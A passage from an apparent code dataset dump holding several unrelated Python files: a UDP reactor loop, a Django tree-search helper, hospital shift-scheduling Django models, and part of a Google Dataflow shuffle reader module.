self.call_later(-1, func)\n\n def serve_forever(self):\n while True:\n ctime = time.time()\n while len(self.callbacks_heap) > 0 and ctime >= self.callbacks_heap[0][0]:\n _, callback = heapq.heappop(self.callbacks_heap)\n if callback.func is None:\n continue\n if callback.timeout_at > ctime:\n heapq.heappush(self.callbacks_heap, (callback.timeout_at, callback))\n else:\n if callback.fileobj is None:\n callback.func()\n else:\n callback.func(None, None)\n ctime = time.time()\n\n if len(self.callbacks_heap) > 0:\n wait_tout = self.callbacks_heap[0][0] - time.time()\n else:\n wait_tout = 1\n\n for fd, _ in self.selector.poll(wait_tout):\n callback = self.fd2cb[fd]\n data, remote_addr = callback.fileobj.recvfrom(MAX_PACKET_SIZE)\n new_cb, data = callback.func(remote_addr, data)\n\n if data is not None:\n callback.fileobj.sendto(data, remote_addr)\n\n if new_cb is None:\n fobj = callback.fileobj\n self.unregister(callback.fileobj)\n fobj.close()\n else:\n callback.func = new_cb\n","sub_path":"py/reactor.py","file_name":"reactor.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"604760331","text":"from .models import Tree\nfrom django.db.models import Q\nfrom functools import reduce\n\n\ndef get_filter_query(key, value):\n if key is 'type':\n return Q(type=value)\n elif key is 'soil':\n return Q(soil=value)\n elif key is 'sun':\n return Q(sun=value)\n elif key is 'food':\n return Q(food='food')\n elif key is 'water':\n return Q(water=value)\n elif key is 'pruning':\n return Q(pruning=value)\n elif key is 'height':\n ranges = value.split('-')\n if len(ranges) is 1:\n if ranges[0].contains('>'):\n query = Q(max_height__gte=ranges[0])\n else :\n query = Q(max_height__lte=ranges[0])\n else:\n query = Q(max_height__gte=ranges[0]) & Q(max_height__lte=ranges[1])\n return query\n elif key is 'growth_rate':\n return Q(growth_rate=value)\n elif key is 'price':\n return Q(price__lte=value)\n else:\n return Q(type='hedge')\n\n\ndef search_for_tree(keywords, filters):\n if keywords == '':\n return []\n queries = [Q(name__contains=kw) for kw in keywords.split()]\n query = reduce(lambda curr, new: curr | new, queries)\n query_set = Tree.objects.filter(query)\n if len(filters) is not 0:\n if 'price' in filters:\n filters['price'] = int(filters['price'])\n filter_list = [get_filter_query(key, value) for key, value in filters.items()]\n filter_query = reduce(lambda curr, new: curr & new, filter_list)\n query_set = query_set.filter(filter_query)\n\n return query_set\n","sub_path":"plantatree/store/searching.py","file_name":"searching.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"77327701","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\nimport datetime\nfrom django.utils import timezone\n\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\n\nclass Profile(models.Model):\n\n PORTFOLIO_CHOICES = [\n ('ALL PORTFOLIOS', 'ALL PORTFOLIOS'),\n ('Acute', 'Acute'),\n ('MH', 'MH'),\n ]\n\n DESIGNATION_CHOICES = [\n ('ALL DESIGNATIONS', 'ALL DESIGNATIONS'),\n ('Clerk', 'Clerk'),\n ('ENV', 'ENV'),\n ('Escort', 'Escort'),\n ('PFN', 'PFN'),\n ('PFS', 'PFS'),\n ('PSW', 'PSW'),\n ('RBA', 'RBA'),\n ('RN', 'RN'),\n ('RPN', 'RPN'),\n ('SSW', 'SSW'),\n ('Tech', 'Tech'),\n ]\n\n UNIT_CHOICES = [\n ('ALL UNITS', 'ALL UNITS'),\n ('A1 B1 C1', 'A1 B1 C1'),\n ('A1-Ever/B1', 'A1-Ever/B1'),\n ('A1/B1', 'A1/B1'),\n ('A3/B3', 'A3/B3'),\n ('A3/B3 IP Surgery', 'A3/B3 IP Surgery'),\n ('ACU', 'ACU'),\n ('ACU - SSW', 'ACU - SSW'),\n ('AIPU', 'AIPU'),\n ('Admissions', 'Admissions'),\n ('Birch/Maple', 'Birch/Maple'),\n ('Birch/Maple - DSW', 'Birch/Maple - DSW'),\n ('Birthing', 'Birthing'),\n ('Birthing/Peds', 'Birthing/Peds'),\n ('C1', 'C1'),\n ('C3', 'C3'),\n ('C3/D3', 'C3/D3'),\n ('C3/D3 - UL', 'C3/D3 - UL'),\n ('CAMHU', 'CAMHU'),\n ('CCU', 'CCU'),\n ('Cedar', 'Cedar'),\n ('Chemo', 'Chemo'),\n ('D3', 'D3'),\n ('Day Surgery', 'Day Surgery'),\n ('E3 Flex', 'E3 Flex'),\n ('ER', 'ER'),\n ('Forensics', 'Forensics'),\n ('GEM', 'GEM'),\n ('General', 'General'),\n ('NICU', 'NICU'),\n ('Northern', 'Northern'),\n ('OR', 'OR'),\n ('OR - RBA', 'OR - RBA'),\n ('Osprey', 'Osprey'),\n ('PAC', 'PAC'),\n ('PFN', 'PFN'),\n ('Peds', 'Peds'),\n ('Peri-Op', 'Peri-Op'),\n ('Pharmacy Techs', 'Pharmacy Techs'),\n ('Renal', 'Renal'),\n ('Renal - Aides', 'Renal - Aides'),\n ('Staffing', 'Staffing'),\n ('Sudbury (Oak & Nickel)', 'Sudbury (Oak & Nickel)'),\n ('TM', 'TM'),\n ]\n\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n portfolio_filter = models.CharField(max_length=20, choices=PORTFOLIO_CHOICES, default='ALL PORTFOLIOS', verbose_name='Portfolio Filter')\n designation_filter = models.CharField(max_length=20, choices=DESIGNATION_CHOICES, default='ALL DESIGNATIONS', verbose_name='Designation Filter')\n unit_filter = models.CharField(max_length=40, choices=UNIT_CHOICES, default='ALL UNITS', verbose_name = 'Unit Filter')\n\n @receiver(post_save, sender=User) # https://simpleisbetterthancomplex.com/tutorial/2016/07/22/how-to-extend-django-user-model.html#onetoone\n def create_user_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.create(user=instance)\n\n @receiver(post_save, sender=User)\n def save_user_profile(sender, instance, **kwargs):\n instance.profile.save()\n\nclass Designation(models.Model):\n\n DESIGNATION_CHOICES = [\n ('Clerk', 'Clerk'),\n ('ENV', 'ENV'),\n ('Escort', 'Escort'),\n ('PFN', 'PFN'),\n ('PFS', 'PFS'),\n ('PSW', 'PSW'),\n ('RBA', 'RBA'),\n ('RN', 'RN'),\n ('RPN', 'RPN'),\n ('SSW', 'SSW'),\n ('Tech', 'Tech'),\n ]\n\n # id = models.AutoField(primary_key=True) # By default, Django gives each model this field\n designation = models.CharField(max_length=20, choices=DESIGNATION_CHOICES, verbose_name='Designation', primary_key=True)\n\n class Meta:\n verbose_name = 'Designation'\n verbose_name_plural = 'Designations'\n ordering = ['designation']\n\n def __str__(self):\n return ', '.join([self.designation])\n\n\nclass Staff(models.Model):\n\n TYPE_TRIMMED_CHOICES = [\n ('FT', 'FT'),\n ('PT', 'PT'),\n ('CASUAL', 'CASUAL'),\n ]\n\n UNION_CHOICES = [\n ('CUPE', 'CUPE'),\n ('ONA', 'ONA'),\n ]\n\n DEPARTMENT_CHOICES = [\n ('UNASSIGNED', 'UNASSIGNED'),\n ('A1 B1 C1', 'A1 B1 C1'),\n ('A1-Ever/B1', 'A1-Ever/B1'),\n ('A1/B1', 'A1/B1'),\n ('A3/B3', 'A3/B3'),\n ('A3/B3 IP Surgery', 'A3/B3 IP Surgery'),\n ('ACU', 'ACU'),\n ('ACU - SSW', 'ACU - SSW'),\n ('AIPU', 'AIPU'),\n ('Admissions', 'Admissions'),\n ('Birch/Maple', 'Birch/Maple'),\n ('Birch/Maple - DSW', 'Birch/Maple - DSW'),\n ('Birthing', 'Birthing'),\n ('Birthing/Peds', 'Birthing/Peds'),\n ('C1', 'C1'),\n ('C3', 'C3'),\n ('C3/D3', 'C3/D3'),\n ('C3/D3 - UL', 'C3/D3 - UL'),\n ('CAMHU', 'CAMHU'),\n ('CCU', 'CCU'),\n ('Cedar', 'Cedar'),\n ('Chemo', 'Chemo'),\n ('D3', 'D3'),\n ('Day Surgery', 'Day Surgery'),\n ('E3 Flex', 'E3 Flex'),\n ('ER', 'ER'),\n ('Forensics', 'Forensics'),\n ('GEM', 'GEM'),\n ('General', 'General'),\n ('NICU', 'NICU'),\n ('Northern', 'Northern'),\n ('OR', 'OR'),\n ('OR - RBA', 'OR - RBA'),\n ('Osprey', 'Osprey'),\n ('PAC', 'PAC'),\n ('PFN', 'PFN'),\n ('Peds', 'Peds'),\n ('Peri-Op', 'Peri-Op'),\n ('Pharmacy Techs', 'Pharmacy Techs'),\n ('Renal', 'Renal'),\n ('Renal - Aides', 'Renal - Aides'),\n ('Staffing', 'Staffing'),\n ('Sudbury (Oak & Nickel)', 'Sudbury (Oak & Nickel)'),\n ('TM', 'TM'),\n ]\n\n # id = models.AutoField(primary_key=True) # By default, Django gives each model this field\n name = models.CharField(max_length=30, verbose_name='Name')\n union = models.CharField(max_length=20, choices=UNION_CHOICES, verbose_name='Union')\n contract = models.CharField(max_length=15, verbose_name='Contract')\n type = models.CharField(max_length=15, verbose_name='Type')\n type_trimmed = models.CharField(max_length=15, choices=TYPE_TRIMMED_CHOICES, verbose_name='Type Trimmed')\n status = models.CharField(max_length=15, null=True, blank=True, verbose_name='Status')\n job_title = models.CharField(max_length=50, verbose_name='Job Title')\n department = models.CharField(max_length=50, choices=DEPARTMENT_CHOICES, verbose_name='Department', default='UNASSIGNED')\n designations = models.ManyToManyField(Designation, blank=True, verbose_name='Designations')\n phone_number = models.CharField(max_length=20, null=True, blank=True, verbose_name='Phone Number')\n start_date = models.DateField(null=True, blank=True, verbose_name='Start Date') # Keep both\n seniority_hours = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True, verbose_name='Seniority Hours') # Keep both\n\n class Meta:\n verbose_name = 'Staff'\n verbose_name_plural = 'Staff'\n ordering = ['name']\n\n def __str__(self):\n designations_list = []\n try:\n for designation in self.designations.all():\n designations_list.append(str(designation))\n return ', '.join([self.name, self.union, self.type_trimmed, self.department, str(designations_list), str(self.seniority_hours)])\n except Exception:\n return ', '.join([self.name, self.union, self.type_trimmed, self.department, str(self.seniority_hours)])\n\nclass Posting(models.Model):\n\n SHIFT_TIME_OF_DAY_CHOICES = [\n ('Day', 'Day'),\n ('Evening', 'Evening'),\n ('Night', 'Night'),\n ]\n\n SHIFT_LENGTH_CHOICES = [\n ('8 Hours', '8 Hours'),\n ('12 Hours', '12 Hours'),\n ]\n\n PORTFOLIO_CHOICES = [\n ('Acute', 'Acute'),\n ('Mental Health', 'Mental Health'),\n ]\n\n UNIT_CHOICES = [\n ('A1 B1 C1', 'A1 B1 C1'),\n ('A1-Ever/B1', 'A1-Ever/B1'),\n ('A1/B1', 'A1/B1'),\n ('A3/B3', 'A3/B3'),\n ('A3/B3 IP Surgery', 'A3/B3 IP Surgery'),\n ('ACU', 'ACU'),\n ('ACU - SSW', 'ACU - SSW'),\n ('AIPU', 'AIPU'),\n ('Admissions', 'Admissions'),\n ('Birch/Maple', 'Birch/Maple'),\n ('Birch/Maple - DSW', 'Birch/Maple - DSW'),\n ('Birthing', 'Birthing'),\n ('Birthing/Peds', 'Birthing/Peds'),\n ('C1', 'C1'),\n ('C3', 'C3'),\n ('C3/D3', 'C3/D3'),\n ('C3/D3 - UL', 'C3/D3 - UL'),\n ('CAMHU', 'CAMHU'),\n ('CCU', 'CCU'),\n ('Cedar', 'Cedar'),\n ('Chemo', 'Chemo'),\n ('D3', 'D3'),\n ('Day Surgery', 'Day Surgery'),\n ('E3 Flex', 'E3 Flex'),\n ('ER', 'ER'),\n ('Forensics', 'Forensics'),\n ('GEM', 'GEM'),\n ('General', 'General'),\n ('NICU', 'NICU'),\n ('Northern', 'Northern'),\n ('OR', 'OR'),\n ('OR - RBA', 'OR - RBA'),\n ('Osprey', 'Osprey'),\n ('PAC', 'PAC'),\n ('PFN', 'PFN'),\n ('Peds', 'Peds'),\n ('Peri-Op', 'Peri-Op'),\n ('Pharmacy Techs', 'Pharmacy Techs'),\n ('Renal', 'Renal'),\n ('Renal - Aides', 'Renal - Aides'),\n ('Staffing', 'Staffing'),\n ('Sudbury (Oak & Nickel)', 'Sudbury (Oak & Nickel)'),\n ('TM', 'TM'),\n ]\n\n REASON_FOR_REPLACEMENT_CHOICES = [\n ('Bereavement', 'Bereavement'),\n ('Escort', 'Escort'),\n ('Extra', 'Extra'),\n ('LSS', 'LSS'),\n ('Modified', 'Modified'),\n ('Need', 'Need'),\n ('Quarantine', 'Quarantine'),\n ('Replace', 'Replace'),\n ('Sick', 'Sick'),\n ('1 to 1', '1 to 1'),\n ]\n\n STATUS_CHOICES = [\n ('Open', 'Open'),\n ('Pending', 'Pending'),\n ('Closed', 'Closed'),\n ]\n\n # null and blank arguments are False by default\n # null doesn't allow null in the database, blank is not database-related; it prevents '' in forms\n\n # id = models.AutoField(primary_key=True) # By default, Django gives each model this field\n shift_date = models.DateField(verbose_name='Shift Date')\n shift_time_of_day = models.CharField(max_length=30, choices=SHIFT_TIME_OF_DAY_CHOICES, verbose_name='Shift Time of Day')\n shift_length = models.CharField(max_length=30, choices=SHIFT_LENGTH_CHOICES, verbose_name='Shift Length')\n shift_time_range = models.CharField(max_length=30, null=True, blank=True, verbose_name='Shift Time Range (24 hr.)')\n portfolio = models.CharField(max_length=20, choices=PORTFOLIO_CHOICES, verbose_name='Portfolio')\n designation_required = models.ForeignKey(Designation, on_delete=models.SET_NULL, null=True, blank=False, verbose_name='Designation Required') # null=True so that in case a Designation is deleted, we don't lose any Postings\n unit = models.CharField(max_length=50, choices=UNIT_CHOICES, verbose_name='Unit')\n called_in_by = models.CharField(max_length=60, null=True, blank=True, verbose_name='Called In By')\n reason_for_replacement = models.CharField(max_length=50, null=True, blank=True, choices=REASON_FOR_REPLACEMENT_CHOICES, verbose_name='Reason for Replacement')\n absentee = models.ForeignKey(Staff, on_delete=models.CASCADE, null=True, blank=True, verbose_name='Absentee', related_name='absentee')\n extra_shift = models.BooleanField(verbose_name='Extra Shift', default=False)\n overtime_approved = models.BooleanField(verbose_name='Overtime Approved', default=False)\n comment = models.TextField(null=True, blank=True, verbose_name='Comment')\n\n overtime_hours = models.DecimalField(max_digits=4, decimal_places=2, default=0, verbose_name='Overtime Hours')\n consecutive_weekend_ot = models.BooleanField(verbose_name='Consecutive Weekend OT', default=False)\n staff_id = models.ForeignKey(Staff, on_delete=models.SET_NULL, null=True, blank=True, verbose_name='Replacement', related_name='replacement') # null=True so that in case a Staff is deleted, we don't lose any Postings\n absentee_unit_notified = models.BooleanField(verbose_name='Absentee\\'s Unit Notified', default=False)\n replace_unit_notified = models.BooleanField(verbose_name='Replacement\\'s Unit Notified', default=False)\n who_was_informed = models.CharField(max_length=40, null=True, blank=True, verbose_name='Who Was Informed')\n\n status = models.CharField(max_length=30, choices=STATUS_CHOICES, verbose_name='Status', default='Open')\n posting_created_by = models.ForeignKey(User, on_delete=models.SET_NULL, null=True, verbose_name='Posting Created By', related_name='posting_created_by')\n posting_closed_by = models.ForeignKey(User, on_delete=models.SET_NULL, null=True, blank=True, verbose_name='Posting Closed By', related_name='posting_closed_by')\n posting_created_datetime = models.DateTimeField(auto_now_add=True, verbose_name='Posting Created DateTime') # Any field with the auto_now attribute set will also inherit editable=False and won't show in admin panel\n posting_closed_datetime = models.DateTimeField(null=True, blank=True, verbose_name='Posting Closed DateTime')\n\n class Meta:\n verbose_name = 'Posting'\n verbose_name_plural = 'Postings'\n ordering = ['shift_date', 'portfolio', 'designation_required', 'unit']\n\n def __str__(self):\n\n if self.shift_time_range is None:\n return ', '.join([str(self.id), str(self.shift_date)[0:10], self.portfolio, self.shift_time_of_day, self.shift_length, self.unit, self.status])\n\n return ', '.join([str(self.id), str(self.shift_date)[0:10], self.portfolio, self.shift_time_of_day, self.shift_length, self.shift_time_range, self.unit, self.status])\n\n\nclass PossibleReplacement(models.Model):\n # CASCADE, PROTECT, SET_NULL, SET_DEFAULT, SET()\n posting_id = models.ForeignKey(Posting, on_delete=models.CASCADE, verbose_name='Posting ID')\n staff_id = models.ForeignKey(Staff, on_delete=models.CASCADE, verbose_name='Staff ID')\n contacted = models.BooleanField(verbose_name='Contacted', default=False) # The form follows the model, and will show 'Contacted' on GET call for even a blank form\n result = models.CharField(max_length=150, null=True, blank=True, verbose_name='Result')\n contacter = models.ForeignKey(User, on_delete=models.SET_NULL, null=True, blank=True, verbose_name='Contacter')\n contacted_datetime = models.DateTimeField(null=True, blank=True, verbose_name='Contacted DateTime')\n\n took_shift = models.BooleanField(verbose_name='Took Shift', default=False)\n overtime_granted = models.BooleanField(verbose_name='Overtime Granted', default=False) # Overtime is granted for this staff member?\n overtime_hours = models.DecimalField(max_digits=4, decimal_places=2, default=0, verbose_name='Overtime Hours')\n consecutive_weekend_ot = models.BooleanField(verbose_name='Consecutive Weekend OT', default=False)\n absentee_unit_notified = models.BooleanField(verbose_name='Absentee\\'s Unit Notified', default=False)\n replace_unit_notified = models.BooleanField(verbose_name='Replacement\\'s Unit Notified', default=False)\n who_was_informed = models.CharField(max_length=40, null=True, blank=True, verbose_name='Who Was Informed')\n\n\n class Meta:\n verbose_name = 'Possible Replacement'\n verbose_name_plural = 'Possible Replacements'\n ordering = ['-posting_id']\n\n def __str__(self):\n return ', '.join([str(self.posting_id.id), str(self.staff_id.id)])\n\n\nclass SeniorityFilesUpload(models.Model):\n\n upload_datetime = models.DateTimeField(auto_now_add=True, verbose_name='Upload DateTime')\n uploader = models.ForeignKey(User, on_delete=models.SET_NULL, null=True, verbose_name='Uploader', related_name='uploader')\n cupe = models.FileField(upload_to='Seniority Lists/', null=True, blank=True, verbose_name='CUPE')\n ona = models.FileField(upload_to='Seniority Lists/', null=True, blank=True, verbose_name='ONA')\n\n class Meta:\n verbose_name = 'Seniority File'\n verbose_name_plural = 'Seniority Files'\n ordering = ['-upload_datetime']\n\n def __str__(self):\n return ', '.join([str(self.upload_datetime), self.uploader])\n","sub_path":"scheduler/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":15874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"652865701","text":"# Copyright 2016 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Shuffle sources and sinks.\n\nThe worker code communicates with the shuffler using a shuffle client library\n(see shuffle_client below). The shuffle operates with entries consisting of a\n4-tuple: position, key, secondary key (a.k.a. 2nd-key), value.\nAll values are just raw bytes. On the wire a shuffle entry is represented as a\nsequence of length and bytes tuples in the order mentioned above. The length\nis represented as a 4 byte big endian\ninteger.\n\nThe semantics when reading from shuffle is that values are grouped by key and\nthe values associated with a key are sorted by the secondary key. The opaque\nposition information returned for each shuffle entry can be used to reiterate\nover values several times and in general to read in a non-sequential manner.\n\nThe shuffle source supports reiterating over values and values returned\nhave indefinite lifetimes, are stateless and immutable.\n\"\"\"\n\nfrom __future__ import absolute_import\n\nimport base64\nimport cStringIO as StringIO\nimport logging\nimport struct\n\nfrom google.cloud.dataflow.coders import observable\nfrom google.cloud.dataflow.io import iobase\nfrom google.cloud.dataflow.io import range_trackers\n\n\n# The following import works perfectly fine for the Dataflow SDK properly\n# installed. However in the testing environment the module is not available\n# since it is built elsewhere. The tests rely on the test_reader/test_writer\n# arguments for shuffle readers and writers respectively to inject alternative\n# implementations.\ntry:\n from google.cloud.dataflow.worker import shuffle_client # pylint: disable=g-import-not-at-top\nexcept ImportError:\n pass\n\n\ndef _shuffle_decode(parameter):\n \"\"\"Decodes a shuffle parameter.\n\n The parameters used to initialize a shuffle source or shuffle sink are sent\n by the service as urlsafe_base64 Unicode strings. In addition, the encoding\n does not contain the '=' padding expected by the base64 library.\n\n The parameters using this encoding are: shuffle reader positions (start/end),\n and shuffle reader/writer configuration protobufs.\n\n Args:\n parameter: A Unicode string encoded using urlsafe_base64.\n\n Returns:\n Decoded string.\n \"\"\"\n # Convert to str and compensate for the potential lack of padding.\n parameter = str(parameter)\n if len(parameter) % 4 != 0:\n parameter += '=' * (4 - len(parameter) % 4)\n return base64.urlsafe_b64decode(parameter)\n\n\nclass ShuffleEntry(object):\n \"\"\"A (position, key, 2nd-key, value) tuple as used by the shuffle library.\"\"\"\n\n def __init__(self, key, secondary_key, value, position):\n self.key = key\n self.secondary_key = secondary_key\n self.value = value\n self.position = position\n\n def __str__(self):\n return '<%s>' % self._str_internal()\n\n def __repr__(self):\n return '<%s at %s>' % (self._str_internal(), hex(id(self)))\n\n def _str_internal(self):\n return 'ShuffleEntry %s%s' % (self.key, '/%s' % self.secondary_key\n if self.secondary_key != self.key else '')\n\n def __eq__(self, other):\n return (self.key == other.key and\n self.secondary_key == other.secondary_key and\n self.value == other.value and\n self.position == other.position)\n\n @property\n def size(self):\n \"\"\"Returns the size in bytes of the serialized entry.\"\"\"\n return (16 + len(self.key) + len(self.secondary_key) + len(self.value) +\n (len(self.position) if self.position else 0))\n\n def to_bytes(self, stream, with_position=True):\n \"\"\"Writes the serialized shuffle entry to the stream.\n\n Args:\n stream: A StringIO where the bytes are written to.\n with_position: True whenever reading from shuffle. False when we write\n an entry to the shuffle.\n \"\"\"\n # The struct.pack '>I' specifier means 32 bit big endian integer.\n if with_position:\n stream.write(struct.pack('>I', len(self.position)))\n stream.write(self.position)\n stream.write(struct.pack('>I', len(self.key)))\n stream.write(self.key)\n stream.write(struct.pack('>I', len(self.secondary_key)))\n stream.write(self.secondary_key)\n stream.write(struct.pack('>I', len(self.value)))\n stream.write(self.value)\n\n @staticmethod\n def from_stream(stream, with_position=True):\n \"\"\"Returns a shuffle entry read from a StringIO stream.\n\n Args:\n stream: StringIO stream to read the bytes from.\n with_position: False only for tests when we want to read something that\n was written to the shuffle without a position. During normal execution\n when reading the position is always there.\n\n Returns:\n A fully initialized shuffle entry read from the StringIO stream.\n \"\"\"\n if with_position:\n position_length = struct.unpack('>I', stream.read(4))\n position = stream.read(position_length[0])\n else:\n position = None\n key_length = struct.unpack('>I', stream.read(4))\n key = stream.read(key_length[0])\n secondary_key_length = struct.unpack('>I', stream.read(4))\n secondary_key = stream.read(secondary_key_length[0])\n value_length = struct.unpack('>I', stream.read(4))\n value = stream.read(value_length[0])\n return ShuffleEntry(key, secondary_key, value, position)\n\n\nclass ShuffleEntriesIterable(object):\n \"\"\"An iterable over all entries between two positions filtered by key.\n\n The method can be used to iterate over all values in the shuffle if key is\n None and start and nd positions are ''.\n \"\"\"\n\n def __init__(self, reader, start_position='', end_position='', key=None):\n \"\"\"Constructs an iterable for reading sequentially entries in a range.\n\n The iterable object can be used to get all the shuffle entries associated\n with a key (repeatedly) or simply iterating over all entries (if key is\n None).\n\n Args:\n reader: A shuffle reader object. These are shared among all iterables\n since there are networking costs associated to setting one up.\n start_position: The first shuffle position to read from.\n end_position: The shuffle position where reading will stop.\n key: The key to match for all shuffle entries if not None. The iteration\n stops when a record with a different key is encountered.\n\n \"\"\"\n self.reader = reader\n self.start_position = start_position\n self.end_position = end_position\n self.key = key\n self._pushed_back_entry = None\n\n def push_back(self, entry):\n \"\"\"Pushes back one entry to support simple look ahead scenarios.\"\"\"\n if self._pushed_back_entry is not None:\n raise RuntimeError('There is already an entry pushed back.')\n self._pushed_back_entry = entry\n\n def __iter__(self):\n last_chunk_seen = False\n start_position = self.start_position\n end_position = self.end_position\n while not last_chunk_seen:\n chunk, next_position = self.reader.Read(start_position, end_position)\n if not next_position: # An empty string signals the last chunk.\n last_chunk_seen = True\n # Yield records inside the chunk just read.\n read_bytes, total_bytes = 0, len(chunk)\n stream = StringIO.StringIO(chunk)\n while read_bytes < total_bytes:\n entry = ShuffleEntry.from_stream(stream)\n if self.key is not None and self.key != entry.key:\n return\n read_bytes += entry.size\n yield entry\n # Check if anything was pushed back. We do this until there is no\n # value pushed back since it is quite possible to have values pushed\n # back multiple times by the upper callers.\n while self._pushed_back_entry is not None:\n to_return, self._pushed_back_entry = self._pushed_back_entry, None\n yield to_return\n # Move on to the next chunk.\n start_position = next_position\n\n\nclass ShuffleEntriesIterator(object):\n \"\"\"An iterator object for a ShuffleEntryIterable with push back support.\n\n The class supports also the iterable protocol (__iter__) and it is careful\n to not create a new iterator from the underlying iterable when iter() is\n called. This is important because shuffle entries iterators are passed\n around and we want to keep reading sequentially while the passing happens.\n More specifically they are kept as the underlying iterators for the key values\n iterables returned for each key.\n \"\"\"\n\n def __init__(self, iterable):\n self.iterable = iterable\n self.iterator = iter(self.iterable)\n\n def __iter__(self):\n return self\n\n def push_back(self, entry):\n self.iterable.push_back(entry)\n\n def next(self):\n return next(self.iterator)\n\n def clone(self, start_position, end_position, key):\n \"\"\"Clones the current iterator with a new key, start, and end position.\"\"\"\n return ShuffleEntriesIterator(\n ShuffleEntriesIterable(\n self.iterable.reader, start_position, end_position, key))\n\n\nclass ShuffleKeyValuesIterable(observable.ObservableMixin):\n \"\"\"An iterable over all values associated with a key.\n\n The class supports reiteration over the values by cloning the underlying\n iterables every time __iter__ gets called. This way the values can be\n reiterated. The first time __iter__ is called no cloning happens.\n This supports the very common case of going once over all values for all keys.\n \"\"\"\n\n def __init__(self, entries_iterator, key, value_coder,\n start_position, end_position=''):\n super(ShuffleKeyValuesIterable, self).__init__()\n self.key = key\n self.value_coder = value_coder\n self.start_position = start_position\n self.end_position = end_position\n self.entries_iterator = entries_iterator\n self.first_values_iterator = None\n\n def __iter__(self):\n if self.first_values_iterator is None:\n # We safe the first values iterator returned because upper layers\n # can use it to drain the values in it. This is an optimization needed\n # to make efficient the very common case of iterating over all key values\n # available.\n self.first_values_iterator = self.values_iterator()\n return self.first_values_iterator\n else:\n # If this is not the first time __iter__ is called we will clone the\n # underlying iterables so that we can reiterate as many times as we\n # want over the key's values.\n return ShuffleKeyValuesIterable(\n self.entries_iterator.clone(\n self.start_position, self.end_position, self.key),\n self.key, self.value_coder,\n self.start_position, self.end_position).values_iterator()\n\n def values_iterator(self):\n for entry in self.entries_iterator:\n if self.key != entry.key:\n # Remember the end_position so that if we reiterate over the values\n # we can do that without reading too much beyond the key.\n self.end_position = entry.position\n self.entries_iterator.push_back(entry)\n break\n decoded_value = self.value_coder.decode(entry.value)\n self.notify_observers(entry.value, is_encoded=True)\n yield decoded_value\n\n def __str__(self):\n return '<%s>' % self._str_internal()\n\n def __repr__(self):\n return '<%s at %s>' % (self._str_internal(), hex(id(self)))\n\n def _str_internal(self):\n return '%s on %s' % (self.__class__.__name__, self.key)\n\n\nclass ShuffleReaderBase(iobase.NativeSourceReader):\n \"\"\"A base class for grouped and ungrouped shuffle readers.\"\"\"\n\n def __init__(self, shuffle_source, reader=None):\n self.source = shuffle_source\n self.reader = reader\n self.entries_iterable = None\n self.key_coder = self.source.key_coder.get_impl()\n self.value_coder = self.source.value_coder.get_impl()\n\n def __enter__(self):\n if self.reader is None:\n self.reader = shuffle_client.PyShuffleReader(\n _shuffle_decode(self.source.config_bytes))\n # Initialize the shuffle entries iterable. For now we read from start to\n # end which is enough for plain GroupByKey operations.\n if self.entries_iterable is None:\n self.entries_iterable = ShuffleEntriesIterable(\n self.reader, self.source.start_position, self.source.end_position)\n return self\n\n def __exit__(self, exception_type, exception_value, traceback):\n pass\n\n\nclass GroupedShuffleReader(ShuffleReaderBase):\n \"\"\"A shuffle reader providing grouped reading.\"\"\"\n\n def __init__(self, shuffle_source, reader=None):\n super(GroupedShuffleReader, self).__init__(shuffle_source, reader)\n self._range_tracker = range_trackers.GroupedShuffleRangeTracker(\n decoded_start_pos=shuffle_source.start_position,\n decoded_stop_pos=shuffle_source.end_position)\n\n def __iter__(self):\n entries_iterator = ShuffleEntriesIterator(self.entries_iterable)\n for entry in entries_iterator:\n entries_iterator.push_back(entry)\n key_values = ShuffleKeyValuesIterable(\n entries_iterator,\n entry.key, self.value_coder, entry.position)\n group_start = entry.position\n\n last_group_start = self._range_tracker.last_group_start()\n is_at_split_point = (\n last_group_start is None or group_start != last_group_start)\n\n if is_at_split_point:\n if not self._range_tracker.try_claim(group_start):\n # If an end position is defined, reader has read all records up to the\n # defined end position, otherwise, reader has read all records of the\n # source.\n return\n else:\n self._range_tracker.set_current_position(group_start)\n\n yield (self.key_coder.decode(entry.key), key_values)\n # We need to drain the iterator returned just in case this\n # was not done by the caller. Otherwise we will not properly advance\n # to the next key but rather return the next entry for the current\n # key (if there are multiple values).\n drain_iterator = key_values.first_values_iterator\n if drain_iterator is None:\n drain_iterator = iter(key_values)\n for _ in drain_iterator:\n pass\n\n def get_progress(self):\n last_group_start = self._range_tracker.last_group_start()\n if last_group_start is None:\n return None\n reader_position = iobase.ReaderPosition(\n shuffle_position=base64.urlsafe_b64encode(last_group_start))\n return iobase.ReaderProgress(position=reader_position)\n\n def request_dynamic_split(self, dynamic_split_request):\n assert dynamic_split_request is not None\n split_request_progress = dynamic_split_request.progress\n if split_request_progress.position is None:\n logging.warning('GroupingShuffleReader only supports split at a Position.'\n ' Requested: %r', dynamic_split_request)\n return\n encoded_shuffle_position = split_request_progress.position.shuffle_position\n if encoded_shuffle_position is None:\n logging.warning('GroupingShuffleReader only supports split at a shuffle'\n ' position. Requested: %r'\n , split_request_progress.position)\n return\n\n if self._range_tracker.try_split(_shuffle_decode(encoded_shuffle_position)):\n logging.info('Split GroupedShuffleReader at %s', encoded_shuffle_position)\n split_position = iobase.ReaderPosition(\n shuffle_position=encoded_shuffle_position)\n return iobase.DynamicSplitResultWithPosition(split_position)\n else:\n logging.info('Refusing to split GroupedShuffleReader %r at %s'\n , self, encoded_shuffle_position)\n\n\nclass 